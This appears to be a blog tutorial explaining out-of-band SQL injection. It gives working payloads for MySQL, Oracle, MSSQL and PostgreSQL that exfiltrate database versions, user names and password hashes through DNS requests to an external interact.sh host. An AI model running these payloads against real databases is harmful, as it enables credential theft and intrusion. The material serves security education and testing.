Out-Of-Band SQL Injection Explained | SQL injection Series | Web Security

Introduction

Out-of-band Injection occurs when an attacker is unable to use the same channel like in-band injection attacks to launch the attack and gather results. Out-of-band attacks are not very common because it depends on some special features of database servers, which are need to be enabled in order to successful exploitation.

Out-of-band injection techniques are used when inferential injection techniques such as time based and injection or boolean based injection doesn’t work properly or the server responses are not very stable. Out-of-band sql injection rely on the ability of database servers to make DNS or HTTP requests to deliver data to an attacker.

For example consider the below query is vulnerable to sql injection

http://vulnerable.com/search.php?query=text'

The attacker tries to exploit sql injection with in-band and inferential (boolean and time based) injection techniques, but the response will remain the same. So in this situation to confirm the vulnerability attacker try to use OOB (Out-Of-Bound) technique to infiltrate data through DNS query.

In OOB injection technique the data is exfiltrated using DNS queries or using HTTP requests (only in Oracle DB). The attack scenario will look like this

OOB Injection Paper – Lee Chun How

As we can see to collect data we need an external service to make request, and for this purpose we can use burp-collaborator which comes with burpsuite or you can also use interactSH service.

Now if the back-end database system is Mysql then the payload will be :

select load_file(CONCAT('\\',(SELECT+@@version),'.','your-external-service-url.com\vfw'))

As we can see in the query that select @@version query gets executed. So the full url will look like

http://vulnerable.com/search.php?query=text'%20union%20select%20load_file(CONCAT('\\',(SELECT+@@version),'.','.','c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.interact.sh\vfw'))

Payloads for OOB in Different Databases

For DNS requests

  • Oracle Database
SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.interact.sh',80) FROM dual;
  • Microsoft Database
DECLARE @a varchar(1024); DECLARE @b varchar(1024); SELECT @a = (SELECT system_user); SELECT @b = (SELECT DB_Name()); EXEC('master..xp_dirtree"\\'+@a+''+'.'+''+@b+'.c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.interact.sh\egg$"'); 
  • PostgresSQL Database
DROP TABLE IF EXISTS table_output; CREATE TABLE table_output(content text); CREATE OR REPLACE FUNCTION temp_function()RETURNS VOID AS $$ DECLARE exec_cmd TEXT; DECLARE query_result_version TEXT; DECLARE query_result_user TEXT; DECLARE query_result_password TEXT; BEGIN SELECT INTO query_result_version (SELECT current_setting('server_version')); SELECT INTO query_result_user (SELECT usename FROM pg_shadow); SELECT INTO query_result_password (SELECT passwd FROM pg_shadow); exec_cmd := E'COPY table_output(content) FROM E'\\\\'||query_result_version||'.'||query_result_user||'.'||query_result_password||E'.c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.interact.sh\\foobar.txt''; EXECUTE exec_cmd; END; $$ LANGUAGE plpgsql SECURITY DEFINER; SELECT temp_function();
  • Mysql Database
UNION SELECT load_file(CONCAT('\\',(SELECT+@@version),'.','.','c59e3crp82ke7bcnedq0cfjqdpeyyyyyn.interact.sh\vfw'))   

To get a full list of Payloads checkout Github repo.

For more detailed information about OOB injection read the paper A Study of Out-of-Band Structured Query Language Injection by Lee Chun How.

References

https://infosecwriteups.com/out-of-band-oob-sql-injection-87b7c666548b
https://zenodo.org/record/3556347#.XeDK1tURVPY
https://github.com/Gabriel-Labs/OOB-SQLi
https://www.acunetix.com/blog/articles/blind-out-of-band-sql/
https://usamaazad.medium.com/dns-based-out-of-band-blind-sql-injection-in-oracle-dumping-data-45f506296945

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.